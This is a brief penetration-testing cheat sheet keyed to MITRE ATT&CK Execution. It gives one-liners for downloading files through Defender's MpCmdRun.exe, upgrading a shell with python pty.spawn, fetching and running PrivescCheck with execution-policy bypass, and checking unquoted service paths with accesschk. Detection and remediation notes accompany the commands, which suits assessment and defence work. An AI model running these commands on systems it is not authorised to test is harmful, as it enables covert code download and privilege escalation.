MITRE ATT&CK Enterprise: TA0002 - Execution
dl
dl = download
- /sys/powershell#transfer-http
- /dev/snippet#python-dl
- juggernaut-sec
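# download
# note: MpCmdRun.exe is the Microsoft Defender command-line utility; the version directory under platform\ differs per host.
# detection: alert on process-creation events where MpCmdRun.exe runs with -url / -path arguments; later Defender platform releases reportedly removed this download capability.
C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2008.9-0\MpCmdRun.exe -url <url> -path <local-path>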
rshell
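# run bash on a pseudo-terminal via python (turns a non-interactive shell into one with a TTY)
# detection: a python process whose command line contains pty.spawn and that starts /bin/bash, especially under a service account, is worth alerting on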
python -c 'import pty; pty.spawn("/bin/bash")'
escalation
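# download PrivescCheck.ps1
# caveat: this URL tracks the master branch, so the script can change between runs; for an authorized assessment, pin a reviewed commit or release and verify the file hash before executing it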
wget https://raw.githubusercontent.com/itm4n/PrivescCheck/master/PrivescCheck.ps1
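# run the extended checks and write a txt report
# note: %COMPUTERNAME% is expanded by cmd.exe, so launch this line from cmd.exe rather than from a PowerShell prompt
# note: -ep bypass only skips the execution policy, which is not a security boundary; AMSI and (if enabled) Script Block Logging still see the script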
powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck -Extended -Report PrivescCheck_%COMPUTERNAME%"
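# unquoted service path: check which directories along the service path are writable
# accesschk flags: -u suppress errors, -w only objects with write access, -d directories only, -q no banner
# caveat: a backslash directly before the closing quote (as in the second command) escapes that quote in Windows argument parsing; drop the trailing backslash if the path is not resolved
# remediation: quote the service ImagePath in the registry and remove write permissions for non-administrators on every directory in the path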
accesschk /accepteula -uwdq "C:\Program Files\Unquoted Service Path"
accesschk /accepteula -uwdq "C:\Program Files (x86)\Windows Identity Foundation\v3.5\"